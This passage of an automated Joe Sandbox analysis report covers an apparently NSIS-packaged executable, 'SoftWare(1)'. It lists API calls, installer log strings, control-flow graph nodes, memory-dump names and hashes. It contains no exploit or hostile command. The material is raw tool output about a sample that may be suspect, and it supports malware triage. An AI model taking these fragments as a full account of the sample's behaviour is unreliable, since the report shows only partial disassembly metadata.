                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                                                                                                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                                                                                                                                                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                                                                                                                                                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • Rename on reboot: %s, xrefs: 00401943
                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                                                                                                                                                                                      • Sleep(%d), xrefs: 0040169D
                                                                                                                                                                                                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                                                                                                                                                                                                      • BringToFront, xrefs: 004016BD
                                                                                                                                                                                                                                      • Jump: %d, xrefs: 00401602
                                                                                                                                                                                                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                                                                                                                                                                                      • detailprint: %s, xrefs: 00401679
                                                                                                                                                                                                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                                                                                                                                                                                                      • Rename: %s, xrefs: 004018F8
                                                                                                                                                                                                                                      • Aborting: "%s", xrefs: 0040161D
                                                                                                                                                                                                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                                                                                                                                                                                      • Call: %d, xrefs: 0040165A
                                                                                                                                                                                                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                                                                                                                                                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                                                                                                                                                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                                                                                                                                                                                      • Rename failed: %s, xrefs: 0040194B
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                                                                                                                                                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                                                                                                                                                                                      • API String ID: 2872004960-3619442763
                                                                                                                                                                                                                                      • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                      • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                                                                                                                                                                                      • ShowWindow.USER32(?), ref: 004054FE
                                                                                                                                                                                                                                      • DestroyWindow.USER32 ref: 00405512
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                                                                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                                                                                                                                                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                                                                                                                                                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                                                                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                                                                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00405783
                                                                                                                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                                                                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                                                                                                                                                                                      • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                                                                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3282139019-0
                                                                                                                                                                                                                                      • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                      • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                                                                                                                                                                                      • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                                                                                                                                                                                        • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                                                                                                                                                                                      • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                                                                                                                                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                                                                                                                                                                                      • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                                                                                                                                                                                        • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                                                                                                                                                                                      • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                                                                                                                                                                                      • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                                                                                                                                                                                      • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                                                                                                                                                                                      • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                                      • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                                                                                                                      • API String ID: 608394941-2746725676
                                                                                                                                                                                                                                      • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                      • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(00000000,00000000,LikedShortcutsGives,004D70B0,00000000,00000000), ref: 00401A76
                                                                                                                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,LikedShortcutsGives,LikedShortcutsGives,00000000,00000000,LikedShortcutsGives,004D70B0,00000000,00000000), ref: 00401AA0
                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426D79,759223A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426D79,759223A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                        • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                                                                                                                                                                                      • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$LikedShortcutsGives
                                                                                                                                                                                                                                      • API String ID: 4286501637-3644761111
                                                                                                                                                                                                                                      • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                      • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                      control_flow_graph 587 40337f-403398 588 4033a1-4033a9 587->588 589 40339a 587->589 590 4033b2-4033b7 588->590 591 4033ab 588->591 589->588 592 4033c7-4033d4 call 403336 590->592 593 4033b9-4033c2 call 403368 590->593 591->590 597 4033d6 592->597 598 4033de-4033e5 592->598 593->592 599 4033d8-4033d9 597->599 600 403546-403548 598->600 601 4033eb-403432 GetTickCount 598->601 604 403567-40356b 599->604 602 40354a-40354d 600->602 603 4035ac-4035af 600->603 605 403564 601->605 606 403438-403440 601->606 607 403552-40355b call 403336 602->607 608 40354f 602->608 609 4035b1 603->609 610 40356e-403574 603->610 605->604 611 403442 606->611 612 403445-403453 call 403336 606->612 607->597 620 403561 607->620 608->607 609->605 615 403576 610->615 616 403579-403587 call 403336 610->616 611->612 612->597 621 403455-40345e 612->621 615->616 616->597 624 40358d-40359f WriteFile 616->624 620->605 623 403464-403484 call 4076a0 621->623 630 403538-40353a 623->630 631 40348a-40349d GetTickCount 623->631 626 4035a1-4035a4 624->626 627 40353f-403541 624->627 626->627 629 4035a6-4035a9 626->629 627->599 629->603 630->599 632 4034e8-4034ec 631->632 633 40349f-4034a7 631->633 634 40352d-403530 632->634 635 4034ee-4034f1 632->635 636 4034a9-4034ad 633->636 637 4034af-4034e0 MulDiv wsprintfW call 404f9e 633->637 634->606 641 403536 634->641 639 403513-40351e 635->639 640 4034f3-403507 WriteFile 635->640 636->632 636->637 642 4034e5 637->642 644 403521-403525 639->644 640->627 643 403509-40350c 640->643 641->605 642->632 643->627 645 40350e-403511 643->645 644->623 646 40352b 644->646 645->644 646->605
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 004033F1
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00403492
                                                                                                                                                                                                                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,?), ref: 004034BB
                                                                                                                                                                                                                                      • wsprintfW.USER32 ref: 004034CE
                                                                                                                                                                                                                                      • WriteFile.KERNELBASE(00000000,00000000,00426D79,00403792,00000000), ref: 004034FF
                                                                                                                                                                                                                                      • WriteFile.KERNEL32(00000000,00420170,?,00000000,00000000,00420170,?,000000FF,00000004,00000000,00000000,00000000), ref: 00403597
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2029818383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029797278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029834725.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029851088.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2029951500.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SoftWare(1).jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CountFileTickWrite$wsprintf
                                                                                                                                                                                                                                      • String ID: (]C$... %d%%$pAB$y-B$ymB
                                                                                                                                                                                                                                      • API String ID: 651206458-981595158
                                                                                                                                                                                                                                      • Opcode ID: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                      • Instruction ID: 38da17626370685da8d32df628044978fcb9abff53cdf920ebdff1c577d6aec0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a825d6787153bf0de4e2119c04a804022ac971a8914dbc6ec561ebe6254ceb78
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BE615D71900219EBCF10DF69ED8469E7FBCAB54356F10413BE810B72A0D7789E90CBA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                      • Not Executed
